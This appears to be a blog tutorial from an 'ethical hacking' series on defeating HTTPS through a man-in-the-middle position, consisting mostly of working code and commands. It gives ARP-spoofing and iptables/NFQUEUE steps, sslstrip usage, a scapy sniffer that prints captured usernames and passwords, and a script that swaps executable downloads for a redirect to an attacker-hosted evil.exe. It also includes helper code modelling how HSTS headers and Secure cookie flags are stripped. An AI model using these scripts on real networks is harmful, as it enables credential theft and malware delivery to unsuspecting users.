Python Ethical Hacking - Bypass HTTPS(1)

HTTPS:

Problem:

  • Data in HTTP is sent as plain text.
  • A MITM can read and edit requests and responses.

-> not secure

Solution:

  • Use HTTPS.
  • HTTPS is HTTP carried over TLS (Transport Layer Security); the older SSL (Secure Sockets Layer) versions it replaced are deprecated.
  • A MITM still sees the packets but can no longer read or modify the HTTP inside them, so the sniffing and injection used against plain HTTP need a way around the encryption.

ARP Spoofing With SSLStrip

1. Flush the existing iptables rules (--flush clears the filter table; it does not touch the routing table), enable IP forwarding so the victim keeps connectivity, and start the ARP spoofing script so the target's traffic flows through the attacker.

iptables --flush
echo 1 > /proc/sys/net/ipv4/ip_forward
python3 arp_spoof.py

2. Start sslstrip. It listens on port 10000 by default, talks HTTPS to the server where the server offers it, and hands the victim a plain-HTTP copy in which https:// links have been rewritten to http://.

sslstrip

3. Redirect the victim's HTTP traffic arriving at the attacker into sslstrip's listening port. Only port 80 is redirected: the downgrade can act only on connections that start in plain HTTP.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

4. Run the sniff script. It captures on the interface facing the victim, where the requests still carry destination port 80 (the NAT redirect happens after capture), and prints every URL plus any request body that looks like a login form.

#!/usr/bin/env python3

from scapy.layers.http import HTTPRequest
from scapy.packet import Raw
from scapy.sendrecv import sniff as scapy_sniff

# Form field names whose presence in a request body usually marks a login.
KEYWORDS = ["email", "username", "user", "login", "password", "pass", "uid"]


def sniff(interface):
    # store=False: do not keep packets in memory; prn runs once per packet.
    scapy_sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    # Host and Path are bytes (or None if the header is absent); decode leniently.
    host = packet[HTTPRequest].Host or b""
    path = packet[HTTPRequest].Path or b""
    return host.decode(errors="ignore") + path.decode(errors="ignore")


def get_login_info(packet):
    if packet.haslayer(Raw):
        # Raw.load is bytes under Python 3, so decode before the substring test.
        load = packet[Raw].load.decode(errors="ignore")
        for keyword in KEYWORDS:
            if keyword in load:
                return load
    return None


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info + "\n\n")


sniff("eth0")

5. From the target machine, browse a site that still answers on plain HTTP and log in; the submitted fields show up in the sniffer output. Sites that send Strict-Transport-Security, sit on the browser's HSTS preload list, or are reached by typing https:// are never downgraded, so sslstrip sees nothing from them.
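To make the downgrade step concrete, here is an added example (written for this page, not sslstrip's own code) that models what sslstrip does to one server reply and the precondition the browser must meet. The sample response, the host names and the tiny HSTS preload subset are all constructed for the example.

```python
"""Added example: a minimal model of the sslstrip downgrade.

Not sslstrip's own code.  The sample response, host names and the HSTS
preload subset below are constructed for this example.
"""
import re
from typing import Dict, List, Set, Tuple

# Constructed subset of the browser HSTS preload list (the real list is compiled
# into the browser and is far larger).
HSTS_PRELOAD: Set[str] = {"accounts.google.com", "github.com"}

HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.\-]+)")


def build_response(status: bytes, headers: List[Tuple[bytes, bytes]], body: bytes) -> bytes:
    """Serialise an HTTP/1.1 response with a Content-Length that matches the body."""
    hdrs = [(n, v) for n, v in headers if n.lower() != b"content-length"]
    hdrs.append((b"Content-Length", str(len(body)).encode()))
    head = b"".join(n + b": " + v + b"\r\n" for n, v in hdrs)
    return status + b"\r\n" + head + b"\r\n" + body


def parse_response(raw: bytes) -> Tuple[bytes, List[Tuple[bytes, bytes]], bytes]:
    """Split a response into status line, (name, value) headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *lines = head.split(b"\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


# Constructed sample: what the proxy receives from the origin over TLS.
SERVER_RESPONSE = build_response(
    b"HTTP/1.1 200 OK",
    [(b"Content-Type", b"text/html"),
     (b"Strict-Transport-Security", b"max-age=31536000; includeSubDomains"),
     (b"Set-Cookie", b"session=abc123; Secure; HttpOnly")],
    b'<html><a href="https://shop.example/login">Log in</a></html>',
)


def downgrade_response(raw: bytes) -> Tuple[bytes, Set[str]]:
    """Rewrite a reply the way sslstrip does; return (bytes, hosts that were stripped).

    Links and Location headers lose the 's', the HSTS header is dropped so the
    browser never learns the site wants TLS, and the Secure flag is removed so
    the cookie is later sent on the plain-HTTP leg the attacker can read.
    """
    status, headers, body = parse_response(raw)
    stripped: Set[str] = set()

    def to_http(m):
        stripped.add(m.group(1).decode())
        return b"http://" + m.group(1)

    new_body = HTTPS_URL.sub(to_http, body)
    new_headers = []
    for name, value in headers:
        lname = name.lower()
        if lname == b"strict-transport-security":
            continue
        if lname == b"location":
            value = HTTPS_URL.sub(to_http, value)
        elif lname == b"set-cookie":
            value = re.sub(rb";\s*secure\b", b"", value, flags=re.IGNORECASE)
        new_headers.append((name, value))
    return build_response(status, new_headers, new_body), stripped


def browser_sends_plain_http(host: str, typed_https: bool,
                             hsts_cache: Dict[str, int],
                             preload: Set[str] = HSTS_PRELOAD) -> bool:
    """Precondition for the attack: the browser must be willing to send a
    plaintext request to host.  It is not if the user typed https://, if the
    host is preloaded, or if an earlier visit cached HSTS (seconds remaining)."""
    if typed_https or host in preload:
        return False
    return hsts_cache.get(host, 0) <= 0


if __name__ == "__main__":
    out, hosts = downgrade_response(SERVER_RESPONSE)
    print(out.decode())
    print("stripped hosts:", hosts)
    print("shop.example downgradable:", browser_sends_plain_http("shop.example", False, {}))
    print("github.com downgradable:", browser_sends_plain_http("github.com", False, {}))
```

The stripped-host set is what a real sslstrip keeps so that, when the victim later requests http://shop.example/login, the proxy knows to fetch it over HTTPS itself; the browser_sends_plain_http check is the reason step 5 fails against HSTS sites.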

 

Replacing Downloads on HTTPS Pages:

1. Execute the following commands with sslstrip still listening on port 10000. Because the REDIRECT hands HTTP traffic to sslstrip on the attacker's own host, the proxied connection traverses the INPUT and OUTPUT chains rather than FORWARD, so that is where the NFQUEUE hooks go. Note that iptables --flush only clears the filter table; if the REDIRECT rule from the previous section is still present, flush the nat table too (iptables -t nat --flush) so it is not added twice.

iptables --flush
iptables -I OUTPUT -j NFQUEUE --queue-num 0
iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
python3 arp_spoof.py

2. Adapt the download-replacing NFQUEUE script and run it. HTTP traffic now goes to sslstrip on port 10000 instead of straight to port 80, so the script matches requests on destination port 10000 and replies on source port 10000:

#!/usr/bin/env python3

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

# ACK numbers of requests for .exe files. The reply to such a request carries
# the same value as its SEQ, which is how the response is matched to it.
ack_list = []

# The attacker's web server hosting the replacement file (address used on this page).
ATTACKER = "10.0.0.43"
REDIRECT = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Location: http://10.0.0.43/evil-files/evil.exe\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def set_load(packet, load):
    packet[Raw].load = load
    # Drop length and checksums so scapy recomputes them for the new payload.
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        # Binary bodies must not raise, so decode leniently.
        load = scapy_packet[Raw].load.decode(errors="ignore")
        if scapy_packet[TCP].dport == 10000:
            # Request on its way to sslstrip: remember it if it fetches an .exe,
            # unless it already targets our own server (avoids a redirect loop).
            if ".exe" in load and ATTACKER not in load:
                print("[+] EXE Request")
                ack_list.append(scapy_packet[TCP].ack)
        elif scapy_packet[TCP].sport == 10000:
            # Response from sslstrip whose SEQ matches a remembered request.
            if scapy_packet[TCP].seq in ack_list:
                ack_list.remove(scapy_packet[TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, REDIRECT)
                # bytes() builds the packet; str() would give a text summary.
                packet.set_payload(bytes(modified_packet))

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print("")
finally:
    queue.unbind()

3. From the target, browse to https://winzip.com and try to download the executable. If the site could be downgraded, the .exe request passes through the queue on its way to sslstrip and the first segment of the reply is overwritten with the 301, so the browser fetches evil.exe from the attacker's server instead.
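The pairing of request and reply by ACK == SEQ is the part of the script that is easiest to get wrong, so here is an added example (written for this page, not the page's own script) that runs the same matching offline on constructed TCP segments, with the 301 built as a complete CRLF-terminated response. The attacker address and path are the ones used above; that a web server actually serves evil.exe there is an assumption, and the host names in the sample segments are constructed.

```python
"""Added example: the request/response matching behind the NFQUEUE replacer,
run offline on constructed segments (no ARP spoofing, sslstrip or NetfilterQueue
needed).  Not the page's own script."""
from dataclasses import dataclass
from typing import Optional, Set
from urllib.parse import urlsplit

# Address and path used on this page. That a server actually serves the file
# there is assumed.
EVIL_URL = "http://10.0.0.43/evil-files/evil.exe"
SSLSTRIP_PORT = 10000


@dataclass
class Segment:
    """The fields of a TCP segment the replacer looks at."""
    sport: int
    dport: int
    seq: int
    ack: int
    payload: bytes


def build_redirect(location: str) -> bytes:
    """A complete 301: CRLF line endings and Content-Length: 0 tell the
    browser the response is finished, Connection: close ends the stream."""
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def exe_request_host(payload: bytes) -> Optional[str]:
    """Return the Host of a GET for a .exe, else None.  The request line is
    parsed instead of substring-matching '.exe' across the whole payload, so a
    body or cookie containing '.exe' is not a hit."""
    try:
        head = payload.decode("latin-1").split("\r\n\r\n", 1)[0]
        request_line, *header_lines = head.split("\r\n")
        method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None
    if method != "GET":
        return None
    parts = urlsplit(target)  # handles both '/p.exe?x=1' and 'http://h/p.exe'
    if not parts.path.lower().endswith(".exe"):
        return None
    host = parts.hostname
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host = value.strip().split(":")[0]  # drop an explicit port
    return host


class DownloadReplacer:
    """Pairs the victim's .exe request with the proxy's reply via ACK == SEQ."""

    def __init__(self, evil_url: str = EVIL_URL, proxy_port: int = SSLSTRIP_PORT):
        self.evil_url = evil_url
        self.evil_host = urlsplit(evil_url).hostname
        self.proxy_port = proxy_port
        self.pending: Set[int] = set()  # ACKs of .exe requests awaiting a reply

    def handle(self, seg: Segment) -> Optional[bytes]:
        """Return the replacement payload for seg, or None to let it pass."""
        if seg.dport == self.proxy_port:
            host = exe_request_host(seg.payload)
            # Never redirect the fetch of our own file, or the victim loops.
            if host is not None and host != self.evil_host:
                self.pending.add(seg.ack)
            return None
        if seg.sport == self.proxy_port and seg.seq in self.pending:
            self.pending.discard(seg.seq)
            return build_redirect(self.evil_url)
        return None


if __name__ == "__main__":
    # Constructed segments: victim (port 40000) -> sslstrip (10000) and back.
    r = DownloadReplacer()
    req = Segment(40000, 10000, 1000, 5000,
                  b"GET /downloads/winzip.exe HTTP/1.1\r\nHost: download.example\r\n\r\n")
    resp = Segment(10000, 40000, 5000, 1000 + len(req.payload),
                   b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\nMZ\x90\x00")
    print(r.handle(req))            # None: the request passes, its ACK is remembered
    print(r.handle(resp).decode())  # the 301 that replaces the first reply segment
```

Only the first segment of the reply is rewritten; that is enough because the browser acts on the headers as soon as they arrive, and Content-Length: 0 plus Connection: close keep it from waiting for a body.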

Posted 2019-09-15 17:12 by 晨风_Eric. 487 views, 0 comments.